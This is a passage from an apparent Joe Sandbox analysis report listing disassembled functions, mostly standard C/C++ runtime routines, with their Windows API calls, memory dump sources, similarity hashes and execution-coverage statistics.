                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d8c2801c899ca90662130341e75fd31ed57ece4ba3f5111d3d42072213937cbb
                                                                                                                                                                                                                                                    • Instruction ID: b1edf948215e65fc722f33df1537ebf71ee774d49125e8683b49306366d18a20
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8c2801c899ca90662130341e75fd31ed57ece4ba3f5111d3d42072213937cbb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B821F671200615AFDB20AF62CC40C6B77ADAF403687118A2FF81997241FF79EC51879B
                                                                                                                                                                                                                                                    Function 0047484F Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00474857
                                                                                                                                                                                                                                                      • Part of subcall function 0046E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0046FDE8,?,00000000,-00000008), ref: 0046E6A2
                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0047488F
                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004748AF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 158306478-0
                                                                                                                                                                                                                                                    • Opcode ID: bdfa72485a7e0f1afe44cad6d2d1298876fc9de19d8f3cf1c09c99ef5d551010
                                                                                                                                                                                                                                                    • Instruction ID: 1a818ecd258722be9a11b03ec179ac6f299bb5f6d23a37f33ed08ff562404b1d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bdfa72485a7e0f1afe44cad6d2d1298876fc9de19d8f3cf1c09c99ef5d551010
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C311CEF95062697F66113BB79C8DCBF299CDEC5799312442AF80991200FB6C9E01927B
                                                                                                                                                                                                                                                    Function 0046457B Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 00464582
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0046458C
                                                                                                                                                                                                                                                      • Part of subcall function 004624C2: std::_Lockit::_Lockit.LIBCPMT ref: 004624DE
                                                                                                                                                                                                                                                      • Part of subcall function 004624C2: std::_Lockit::~_Lockit.LIBCPMT ref: 004624F7
                                                                                                                                                                                                                                                    • codecvt.LIBCPMT ref: 004645C6
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004645FD
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3716348337-0
                                                                                                                                                                                                                                                    • Opcode ID: 3f107f845cf670470c0be71ec2739f759e59a2ecece8b23a035cfe56a5707b97
                                                                                                                                                                                                                                                    • Instruction ID: cfe3e01e894dee91d3cc2487e6942a66397efe9f22684d2f745c18aa1772fb4e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f107f845cf670470c0be71ec2739f759e59a2ecece8b23a035cfe56a5707b97
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7010031900515ABCF00EBA4D9256AE7771BF90714F20490FE402AB390FFBC8E018B9B
                                                                                                                                                                                                                                                    Function 0047A4E0 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00479B0F,00000000,00000001,00000000,?,?,00475A1F,?,00000000,00000000), ref: 0047A4F7
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00479B0F,00000000,00000001,00000000,?,?,00475A1F,?,00000000,00000000,?,?,?,00475365,00000000), ref: 0047A503
                                                                                                                                                                                                                                                      • Part of subcall function 0047A554: CloseHandle.KERNEL32(FFFFFFFE,0047A513,?,00479B0F,00000000,00000001,00000000,?,?,00475A1F,?,00000000,00000000,?,?), ref: 0047A564
                                                                                                                                                                                                                                                    • ___initconout.LIBCMT ref: 0047A513
                                                                                                                                                                                                                                                      • Part of subcall function 0047A535: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0047A4D1,00479AFC,?,?,00475A1F,?,00000000,00000000,?), ref: 0047A548
                                                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00479B0F,00000000,00000001,00000000,?,?,00475A1F,?,00000000,00000000,?), ref: 0047A528
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2744216297-0
                                                                                                                                                                                                                                                    • Opcode ID: 497a2b7788178a94981d167419421775fc52802a8437c7c4cd6e21141e43c303
                                                                                                                                                                                                                                                    • Instruction ID: 6a4991e05b80d9500a6c8cebb8beed3e2b013e5d6b2c3285532f9efe73d26ec1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 497a2b7788178a94981d167419421775fc52802a8437c7c4cd6e21141e43c303
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9F01C36010215BFCF622F95EC089DE3F26FB887A5F018969FA4995220D63289209B99
                                                                                                                                                                                                                                                    Function 004659A7 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 004659B9
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004659C8
                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 004659D1
                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004659DE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                                                    • Opcode ID: 56d37d1adf457c10d69103a10facb459e935e55996fe2b46e4943983a815534f
                                                                                                                                                                                                                                                    • Instruction ID: d0d6f6d8d9756648ebaf2499cfbc7c026ca03df05cd8c5a877448465417525c0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 56d37d1adf457c10d69103a10facb459e935e55996fe2b46e4943983a815534f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9F0AF70D1120CEBCB00DFB4C98998EBBF4FF1C605B9149AAE412E7110E730AB449F50
                                                                                                                                                                                                                                                    Function 00472117 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0046E783: GetLastError.KERNEL32(00000000,?,00470AB9), ref: 0046E787
                                                                                                                                                                                                                                                      • Part of subcall function 0046E783: SetLastError.KERNEL32(00000000,?,?,00000028,0046B9D2), ref: 0046E829
                                                                                                                                                                                                                                                    • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00469266,?,?,?,00000055,?,-00000050,?,?,?), ref: 004721D6
                                                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00469266,?,?,?,00000055,?,-00000050,?,?), ref: 0047220D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                                    • String ID: utf8
                                                                                                                                                                                                                                                    • API String ID: 943130320-905460609
                                                                                                                                                                                                                                                    • Opcode ID: 26f8bfa5311396e1998af74747987500ec6191a6475afda449884060551b26c3
                                                                                                                                                                                                                                                    • Instruction ID: fd13954711f6a7d8cfd8752ade60f79eea13ff8d23d244f8ec30175988e14bd2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26f8bfa5311396e1998af74747987500ec6191a6475afda449884060551b26c3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6551D571640301AAD725AB758E46BE772A8FF44704F14882FFA4DD7281FAFCE940866D
                                                                                                                                                                                                                                                    Function 0046DFAC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0046DEAD,?,?,00000000,00000000,00000000,?), ref: 0046DFD1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EncodePointer
                                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                                    • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                    • Opcode ID: 248195f48e44c56b95e7b075c763e9f35ec0830a605406c09a534ceff7f6e80f
                                                                                                                                                                                                                                                    • Instruction ID: b4169cd569b007592914c711b3bdc71531c7d1a309fc93613543083afbd2f535
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 248195f48e44c56b95e7b075c763e9f35ec0830a605406c09a534ceff7f6e80f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35419C75A00219AFCF26DF95CC81AEEBBB5FF08304F18805AFA0467251E379D950DB56
                                                                                                                                                                                                                                                    Function 0046D818 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0046DA8F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm$csm
                                                                                                                                                                                                                                                    • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                                    • Opcode ID: 11b676274f2550afa1eadcf414537903dc1af141b52ba49d558cc07e315dae8f
                                                                                                                                                                                                                                                    • Instruction ID: 0d021ae11a56abb11c3749d6464337d8e092f10547ba117a99e7f2f25e7f2c9f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11b676274f2550afa1eadcf414537903dc1af141b52ba49d558cc07e315dae8f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B531E636F042149BCF228F91CC409AB7B65FF09B65B19416BF84449311E33AEC61DB9B
                                                                                                                                                                                                                                                    Function 004629C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00464B74
                                                                                                                                                                                                                                                    • ___raise_securityfailure.LIBCMT ref: 00464C5C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                                    • String ID: xfH
                                                                                                                                                                                                                                                    • API String ID: 3761405300-3993232761
                                                                                                                                                                                                                                                    • Opcode ID: a5b1d36746295d9a95a5c43e0adbec578f1f40ce2a87f8770299acbba2cc80b0
                                                                                                                                                                                                                                                    • Instruction ID: 39199febdbfdc5a7e554d233ce6ba4ea9cff6c73c3d45fb0a9b97c02d3716047
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5b1d36746295d9a95a5c43e0adbec578f1f40ce2a87f8770299acbba2cc80b0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F721BEB4601300DAE790DF25E9857483BF4FB48718F12993EE5089B3A0E3B59980DB8D
                                                                                                                                                                                                                                                    Function 00464A8C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00464A97
                                                                                                                                                                                                                                                    • ___raise_securityfailure.LIBCMT ref: 00464B54
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                                    • String ID: xfH
                                                                                                                                                                                                                                                    • API String ID: 3761405300-3993232761
                                                                                                                                                                                                                                                    • Opcode ID: 1c2d8c7d86d59f82103d3d0ae87a85699c168ea55eeb36fc750c0233c7ceca92
                                                                                                                                                                                                                                                    • Instruction ID: 277ab7d9b7e244d85c6fb97f9e55840c147c6653462c906f5b2b2ad37445a9f7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c2d8c7d86d59f82103d3d0ae87a85699c168ea55eeb36fc750c0233c7ceca92
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F119DB45113449FE780DF29E9856483BB4FB48308F02A97EE8089B360E3759941EF8D
                                                                                                                                                                                                                                                    Function 004629D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(0048648C,ios_base::badbit set,?,?,00461C84,00486478,00461B17), ref: 004629DF
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(0048648C,?,?,00461C84,00486478,00461B17), ref: 00462A19
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireRelease
                                                                                                                                                                                                                                                    • String ID: ios_base::badbit set
                                                                                                                                                                                                                                                    • API String ID: 17069307-3882152299
                                                                                                                                                                                                                                                    • Opcode ID: 54ebc57bedad0184e7fb300402ead5f1acac50ced6cda80316bba91de9e6ce33
                                                                                                                                                                                                                                                    • Instruction ID: bdf85acbe54f2d383e6b7b74163c6bc05045ac2d3bd13d693c401a6a9ba85fc2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54ebc57bedad0184e7fb300402ead5f1acac50ced6cda80316bba91de9e6ce33
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DCF08274600540EBC724AF58D944A2E7B64FB85B75F10473FE89A433A0D7B91842DB5E

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:2.1%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:31.2%
                                                                                                                                                                                                                                                    Total number of Nodes:474
                                                                                                                                                                                                                                                    Total number of Limit Nodes:7
